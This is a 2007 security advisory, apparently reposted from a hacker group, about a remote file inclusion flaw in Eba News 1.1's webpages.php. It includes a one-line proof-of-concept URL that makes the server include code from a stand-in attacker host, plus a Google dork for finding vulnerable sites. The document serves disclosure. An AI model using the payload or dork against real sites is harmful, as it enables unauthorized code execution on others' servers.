Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16807
HistoryApr 20, 2007 - 12:00 a.m.

Eba News Version : v1.1 <= (webpages.php) Remote File Include // starhack.org

2007-04-2000:00:00
vulners.com
15

Eba News Version : v1.1 <= (webpages.php) Remote File Include

Author : SekoMirza
Date Found : Nisan 11 2007
Location : Fransa // …
Critical Lvl : Highly critical
Impact : System access
Where : From Remote

Affected software description:

Application     : Eba News
version         : 1.1
vendor          : http://ebascripts.com/
source url      : http://ebascripts.com/
--------------------------------------------------

Description:
~~~~~~~~

EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes.

 

--------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in admin/public/webpages.php


Proof Of Concept:
~~~~~~~~~~~~

eba/admin/public/webpages.php?filename=http://attact.com/colok.txt?

--------------------------------------------------

google d0rk:
~~~~~~~
&quot;Eba News&quot;

--------------------------------------------------
Solution:
~~~
- download new version in vendor URL 

--------------------------------------------------
Shoutz:
~~
~ My  Sweet       -&gt; Caramel 
~ For Mp3s        -&gt; Hypn0sis
~ For Support     -&gt; www.starhack.org
~ My  Bro         -&gt; PhantomOrchid
~ My  Preceptor   -&gt; Earnk Kazno
 

--------------------------------------------------

Contact:
~~~
 
     Seko[at]se-ko[dot]info
     
-------------------------------- [ EOF ]----------